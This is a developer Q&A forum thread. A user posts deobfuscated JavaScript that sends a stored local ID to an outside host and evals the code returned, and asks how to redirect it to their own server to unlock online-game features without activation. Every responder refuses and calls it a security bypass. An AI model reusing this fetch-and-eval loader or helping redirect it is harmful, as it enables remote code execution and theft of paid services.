Click here to Skip to main content
15,887,683 members
Please Sign up or sign in to vote.
1.00/5 (1 vote)
See more:
Hi there , i have a code and i need someone to explain me what is the point of this code .
JavaScript
var _0xf7466f,
      _0x3f1585 = localStorage.getItem('local_ID')
       return (fetch('https://facing.ml/AimLine/AimLineSpin/extra.php?id=' + _0x3f1585).then(function (_0x2b4e43) {
        _0x2b4e43
          .text()
          .then(function (_0x45520e) {
            _0xf7466f = JSON.parse(_0x45520e)
          })
          .then(function () {
            eval(_0xf7466f.unique_ID)
          })
      }),


What I have tried:

i tried to change the Url fetch but i don't know what's the benefit of variable after (+) in the url ,, this code it's part of long code and give you access for some feature , how i could do that by changing the link and put mine .
Posted
Updated 10-Apr-23 3:57am
v3
Comments
Richard MacCutchan 10-Apr-23 6:20am    
Looks like someone trying to be clever. Replace all those hex numbers with meaningful variable names and it would probably make more sense.
Khaled9340 10-Apr-23 6:31am    
No , this not my code i deobfu it so it came like this but any one can put names the important what this benefit of this code
Richard MacCutchan 10-Apr-23 6:31am    
Where did it come from and why?
Khaled9340 10-Apr-23 6:34am    
this code it's give you access for some feature for game online so i am trying to reach the feature without activation
Richard MacCutchan 10-Apr-23 6:46am    
Well unless you know what the rules are for the game, it is impossible to know what the code is for. You need to go back to the code hacker site where you got it from. But no one here is going to help you get illegal access to any web site.

Quote:
this code it's give you access for some feature for game online so i am trying to reach the feature without activation

Which makes what you are doing an attempt to bypass legitimate security.
We do not condone, support, or assist in the production of malicious code in any way, form, or manner. This is a professional site for professional developers.

If you want to know how to create such things, you need to visit a hacking site: but be sure to disable all firewalls and antivirus products first or they won't trust you enough to tell you.
 
Share this answer
 
The code is obfuscated to make it much harder to do what you're trying to do, and that is figure out what the code is doing.

Quote:
trying to reach the feature without activation
So you're trying to steal functionality you didn't pay for. Piss off.
 
Share this answer
 

This content, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)



CodeProject, 20 Bay Street, 11th Floor Toronto, Ontario, Canada M5J 2N8 +1 (416) 849-8900